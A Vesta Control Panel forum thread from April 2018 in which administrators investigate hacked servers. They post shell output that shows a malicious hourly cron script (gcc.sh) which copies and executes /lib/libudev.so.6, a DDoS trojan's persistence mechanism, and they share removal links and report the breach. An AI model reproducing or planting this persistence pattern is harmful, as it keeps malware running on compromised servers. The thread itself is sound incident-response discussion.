Vesta Control Panel - Forum

Posted: **Sat Apr 07, 2018 6:36 pm**

as i said, i took backup before breach and reinstalled all servers.

Posted: **Sat Apr 07, 2018 6:39 pm**

ls -tl /usr/bin | less

SpoilerShow

for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# ll /etc/init.d/
итого 48
-rw-r--r-- 1 root root 17500 май 3 2017 functions
-rwxr-xr-x 1 root root 4334 май 3 2017 netconsole
-rwxr-xr-x 1 root root 7293 май 3 2017 network
-rw-r--r-- 1 root root 1160 мар 7 07:27 README
-rwxr-xr-x 1 root admin 295 апр 5 10:50 update
-rwxr-xr-x 1 root root 2074 янв 10 06:25 vesta
[root@waterleafshop public_html]# clamscan -r -i /usr
-bash: clamscan: команда не найдена
[root@waterleafshop public_html]# ll /etc/cron.hourly/
итого 12
-rwxr-xr-x 1 root root 392 авг 3 2017 0anacron
-rwxr-x--- 1 root root 172 янв 8 08:27 awstats
-rwxr-xr-x 1 root admin 228 апр 5 10:50 gcc.sh
[root@waterleafshop public_html]# cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[root@waterleafshop public_html]# cat /etc/cron.hourly/0anacron
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi

# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s
[root@waterleafshop public_html]# ls -tl /usr/bin | less
[root@waterleafshop public_html]# ls -tl /usr/bin | less

[6]+ Stopped ls --color=auto -tl /usr/bin | less
[root@waterleafshop public_html]# clear

[root@waterleafshop public_html]# ls -tl /usr/bin | less

-rwxr-xr-x 1 root root 48451 июн 9 2014 zipdetails
-rwxr-xr-x. 1 root root 19568 июн 9 2014 last
-rwxr-xr-x. 1 root root 11240 июн 9 2014 mesg
-r-xr-sr-x. 1 root tty 15344 июн 9 2014 wall
-rwxr-xr-x 1 root root 167272 июн 9 2014 aspell
-rwxr-xr-x 1 root root 11320 июн 9 2014 prezip-bin
-rwxr-xr-x 1 root root 11296 июн 9 2014 word-list-compress
-rwxr-xr-x 1 root root 988 июн 9 2014 ispell
-rwxr-xr-x 1 root root 122 июн 9 2014 spell
-rwxr-xr-x 1 root root 5656 июн 9 2014 precat
-rwxr-xr-x 1 root root 5656 июн 9 2014 preunzip
-rwxr-xr-x 1 root root 5656 июн 9 2014 prezip
-rwxr-xr-x 1 root root 85 июн 9 2014 run-with-aspell
-rwxr-xr-x. 1 root root 2086 июн 9 2014 run-parts
-rwxr-xr-x. 1 root root 19688 июн 9 2014 pkla-admin-identities
-rwxr-xr-x. 1 root root 27960 июн 9 2014 pkla-check-authorization
-rwxr-xr-x. 1 root root 45448 июн 9 2014 pkg-config
-rwxr-xr-x 1 root root 329664 июн 9 2014 flex
-rwxr-xr-x. 1 root root 15768 июн 9 2014 hostname
-rwxr-xr-x. 1 root root 30488 июн 9 2014 testgdbm
-rwxr-xr-x. 1 root root 37528 июн 9 2014 catman
-rwxr-xr-x. 1 root root 87024 июн 9 2014 lexgrog
-rwxr-xr-x. 1 root root 102736 июн 9 2014 man
-rwxr-xr-x. 1 root root 125088 июн 9 2014 mandb
-rwxr-xr-x. 1 root root 33224 июн 9 2014 manpath
-rwxr-xr-x. 1 root root 46456 июн 9 2014 whatis
-rwxr-xr-x 1 root root 40824 июн 9 2014 recode
-rwxr-xr-x. 1 root root 147880 июн 9 2014 eqn
-rwxr-xr-x. 1 root root 83584 июн 9 2014 groff
-rwxr-xr-x. 1 root root 144232 июн 9 2014 grops
-rwxr-xr-x. 1 root root 100952 июн 9 2014 grotty
-rwxr-xr-x. 1 root root 184736 июн 9 2014 pic
-rwxr-xr-x. 1 root root 192048 июн 9 2014 post-grohtml
-rwxr-xr-x. 1 root root 41864 июн 9 2014 preconv
-rwxr-xr-x. 1 root root 88312 июн 9 2014 pre-grohtml
-rwxr-xr-x. 1 root root 33368 июн 9 2014 soelim
-rwxr-xr-x. 1 root root 118744 июн 9 2014 tbl
-rwxr-xr-x. 1 root root 525272 июн 9 2014 troff
-rwxr-xr-x. 1 root root 3392 июн 9 2014 nroff
-rwxr-xr-x. 1 root root 271 июн 9 2014 neqn
-rwxr-xr-x 1 root root 13581 июн 9 2014 pod2man
-rwxr-xr-x 1 root root 11004 июн 9 2014 pod2text
-rwxr-xr-x 1 root root 83424 июн 9 2014 bc
-rwxr-xr-x 1 root root 45392 июн 9 2014 dc
-rwxr-xr-x 1 root root 3724 фев 3 2014 ipcount
-rwxr-xr-x 1 root root 982 фев 3 2014 iptab
-rwxr-xr-x 1 root root 2953 окт 10 2008 zipgrep

cat /etc/cron.hourly/gcc.sh

SpoilerShow

cat /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

SpoilerShow

# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

Posted: **Sat Apr 07, 2018 6:42 pm**

Code: Select all

# cat /opt/backup/etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

Code: Select all

# cat /opt/backup/etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

Code: Select all

# ls -tl /opt/backup/usr/bin | less
total 245832
lrwxrwxrwx   1 root root         38 Mar 30 15:17 npm -> ../lib/node_modules/npm/bin/npm-cli.js
lrwxrwxrwx   1 root root         38 Mar 30 15:17 npx -> ../lib/node_modules/npm/bin/npx-cli.js
lrwxrwxrwx   1 root root          9 Mar 30 15:16 phar -> phar.phar
-rwxr-xr-x   1 root root   33983272 Mar 30 07:10 node
-rwxr-xr-x   1 root root     204552 Mar 29 12:02 memcached
-rwxr-xr-x   1 root root       6110 Mar 29 02:06 memcached-tool
-rwxr-xr-x   1 root root    4935304 Mar 28 14:27 php
-rwxr-xr-x   1 root root    4828904 Mar 28 14:27 php-cgi
-rwxr-xr-x   1 root root    5120416 Mar 28 14:27 zts-php
-rwxr-xr-x   1 root root      14823 Mar 28 14:27 phar.phar
-rwxr-xr-x   1 root root       5475 Mar 28 14:27 php-config
-rwxr-xr-x   1 root root       4776 Mar 28 14:27 phpize
-rwxr-xr-x   1 root root       5659 Mar 28 14:26 zts-php-config
-rwxr-xr-x   1 root root       4788 Mar 28 14:26 zts-phpize
lrwxrwxrwx   1 root root         42 Mar 25 20:04 uglifyjs -> ../lib/node_modules/uglify-js/bin/uglifyjs
lrwxrwxrwx   1 root root         39 Mar 25 17:24 uglifycss -> ../lib/node_modules/uglifycss/uglifycss
lrwxrwxrwx   1 root root         11 Mar 25 17:07 audit2why -> audit2allow
lrwxrwxrwx   1 root root          3 Mar 25 15:46 twopi -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 sfdp -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 osage -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 patchwork -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 neato -> dot
lrwxrwxrwx   1 root root          6 Mar 25 15:46 gxl2dot -> gxl2gv
lrwxrwxrwx   1 root root          6 Mar 25 15:46 gv2gxl -> gxl2gv
lrwxrwxrwx   1 root root          6 Mar 25 15:46 dot2gxl -> gxl2gv
lrwxrwxrwx   1 root root          3 Mar 25 15:46 fdp -> dot
lrwxrwxrwx   1 root root          3 Mar 25 15:46 circo -> dot
lrwxrwxrwx   1 root root         21 Mar 25 14:02 jjs -> /etc/alternatives/jjs
lrwxrwxrwx   1 root root         25 Mar 25 14:02 keytool -> /etc/alternatives/keytool
lrwxrwxrwx   1 root root         22 Mar 25 14:02 orbd -> /etc/alternatives/orbd
lrwxrwxrwx   1 root root         25 Mar 25 14:02 pack200 -> /etc/alternatives/pack200
lrwxrwxrwx   1 root root         28 Mar 25 14:02 policytool -> /etc/alternatives/policytool
lrwxrwxrwx   1 root root         22 Mar 25 14:02 rmid -> /etc/alternatives/rmid
lrwxrwxrwx   1 root root         29 Mar 25 14:02 rmiregistry -> /etc/alternatives/rmiregistry
lrwxrwxrwx   1 root root         28 Mar 25 14:02 servertool -> /etc/alternatives/servertool
lrwxrwxrwx   1 root root         27 Mar 25 14:02 tnameserv -> /etc/alternatives/tnameserv
lrwxrwxrwx   1 root root         27 Mar 25 14:02 unpack200 -> /etc/alternatives/unpack200
lrwxrwxrwx   1 root root         22 Mar 25 14:02 java -> /etc/alternatives/java
lrwxrwxrwx   1 root root          4 Mar 23 20:56 lex -> flex
lrwxrwxrwx   1 root root          4 Mar 23 20:56 flex++ -> flex
lrwxrwxrwx   1 root root          3 Mar 23 20:56 pftp -> ftp
lrwxrwxrwx   1 root root         15 Mar 23 20:56 nail -> ../../bin/mailx
lrwxrwxrwx   1 root root         15 Mar 23 20:56 Mail -> ../../bin/mailx
lrwxrwxrwx   1 root root          5 Mar 23 20:56 mail -> mailx
lrwxrwxrwx   1 root root          7 Mar 23 20:56 dsync -> doveadm
lrwxrwxrwx   1 root root          9 Mar 23 20:56 webazolver -> webalizer
lrwxrwxrwx   1 root root          9 Mar 23 20:56 rrdcreate -> rrdupdate
lrwxrwxrwx   1 root root          9 Mar 23 20:56 rrdinfo -> rrdupdate
lrwxrwxrwx   1 root root         23 Mar 23 20:56 whois -> /etc/alternatives/whois
lrwxrwxrwx   1 root root          2 Mar 23 20:55 mcedit -> mc

Also I've checked all the logs for last 7 days and not found any suspicious places. Unfortunately, logs are disabled for many internal domains (for example, roundcube).

Posted: **Sat Apr 07, 2018 6:57 pm**

https://stackoverflow.com/questions/366 ... ly-malware

https://admin-ahead.com/forum/server-se ... ts-trojan/

Posted: **Sat Apr 07, 2018 7:01 pm**

Those posts do explain the virus and its removal. but even after removal it will eventually reappear again because we are still not aware of a vuln which is obviously present somewhere within the system.

Posted: **Sat Apr 07, 2018 7:06 pm**

Hello,

Same thing here. Fresh install of Ubuntu 16 a week ago. Installed last version VestaCP and a Wordpress right after (no plugins), then on 7th April, server blocked by OVH for DDOS attack. Same IP as you guys in China.

My vesta install : Nginx + php-fpm, vsftpd, exim, iptables + fail2ban, MySQL DB and that's all.

Hope there will be a fix soon.

All my other servers running former version of VestaCP don't seem to be impacted, yet.

Posted: **Sat Apr 07, 2018 7:10 pm**

lukapaunovic wrote: ↑
Sat Apr 07, 2018 7:01 pm
Those posts do explain the virus and its removal. but even after removal it will eventually reappear again because we are still not aware of a vuln which is obviously present somewhere within the system.

Once again, I copy the answer from my hoster, which I posted in another topic

Одновременно с этим, однако судя по всему взлом был как-то связан с vesta и roundcube. Т.к. одновременно с Вашим возникли проблемы ещё на нескольких серверах наших клиентов в аналогичными симптомами. На этих серверах так же стояла Vesta и вредоносные процессы имели текущей рабочей директорией директорию roundcube, при этом дистрибутивы linux отличались.

I checked and I had the latest version of Roundcube 1.3.5. Unfortunately, the hoster did not provide access to an infected server to view other running processes.

Posted: **Sat Apr 07, 2018 7:17 pm**

Studiomax i was referring to dpeca links

Posted: **Sat Apr 07, 2018 7:38 pm**

Users are increasingly coming back to me reporting their servers are hacked :(

Posted: **Sat Apr 07, 2018 7:49 pm**

I think i can handle this.
there are MANY people MANY servers
this is CRAZY
OVH is stuborn and letting me backup some servers some don't

i'm gonna die.
\

Vesta Control Panel - Forum

Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited

Re: Got 10 VestaCP servers exploited